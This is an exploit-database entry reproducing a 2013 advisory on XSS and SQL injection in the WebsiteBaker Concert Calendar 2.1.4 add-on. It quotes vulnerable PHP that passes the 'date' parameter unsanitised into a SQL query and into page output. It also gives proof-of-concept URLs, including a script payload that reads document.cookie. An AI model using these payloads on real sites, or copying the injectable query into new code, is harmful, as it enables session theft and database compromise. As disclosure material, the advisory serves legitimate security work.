header-logo
Suggest Exploit
vendor:
Concert Calendar
by:
Stefan Schurtz
8,8
CVSS
HIGH
XSS & SQLi
89, 79
CWE
Product Name: Concert Calendar
Affected Version From: 2.1.4
Affected Version To: 2.1.4
Patch Exists: NO
Related CWE: N/A
CPE: 2.3:a:websitebaker:concert_calendar:2.1.4
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2013

Websitebaker Add-on ‘Concert Calendar 2.1.4’ XSS & SQLi vulnerability

Websitebaker Add-on 'Concert Calendar 2.1.4' is prone to a XSS and SQLi vulnerability. The vulnerability is present in the view.php file, where the 'date' parameter is not properly sanitized. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request with a malicious 'date' parameter. For the XSS vulnerability, the attacker can send a maliciously crafted HTTP request with a malicious 'date' parameter containing a malicious JavaScript code. For the SQLi vulnerability, the attacker can send a maliciously crafted HTTP request with a malicious 'date' parameter containing a malicious SQL query.

Mitigation:

The vendor has been informed and is currently working on a patch.
Source

Exploit-DB raw data:

Advisory:		Websitebaker Add-on 'Concert Calendar 2.1.4' XSS & SQLi vulnerability
Advisory ID:		SSCHADV2013-001
Author:			Stefan Schurtz
Affected Software:	Successfully tested on Concert Calendar 2.1.4
Vendor URL:		http://addons.websitebaker2.org/pages/en/browse-add-ons.php?id=0E8BC37
Vendor Status:		informed

==========================
Vulnerability Description
==========================

Websitebaker Add-on 'Concert Calendar 2.1.4' is prone to a XSS and SQLi vulnerability

==========================
Vuln code
==========================

// view.php

if (isset($_GET['date'])) {
        $date = $_GET['date'];
}
.
.
.
// SQLi
$query_dates = mysql_query("SELECT * FROM ".TABLE_PREFIX."mod_concert_dates WHERE section_id = '$section_id' && concert_date = '$date'"); // Zeile 184

// XSS

echo " ".switch_date($date, $dateview)." "; // Zeile 176

==========================
PoC-Exploit
==========================

// SQLi (magic_quotes = off)

http://[target]/wb/pages/addon.php?date=[SQLi]

// XSS

http://[target]/wb/pages/addon.php?date='"><script>alert(document.cookie)</script>

==========================
Solution
==========================

-

==========================
Disclosure Timeline
==========================

01-Jan-2013 - developer informed 

==========================
Credits
==========================

Vulnerabilities found and advisory written by Stefan Schurtz.

==========================
References
==========================

http://addons.websitebaker2.org/pages/en/browse-add-ons.php?id=0E8BC37
http://www.darksecurity.de/advisories/2012/SSCHADV2012-022.txt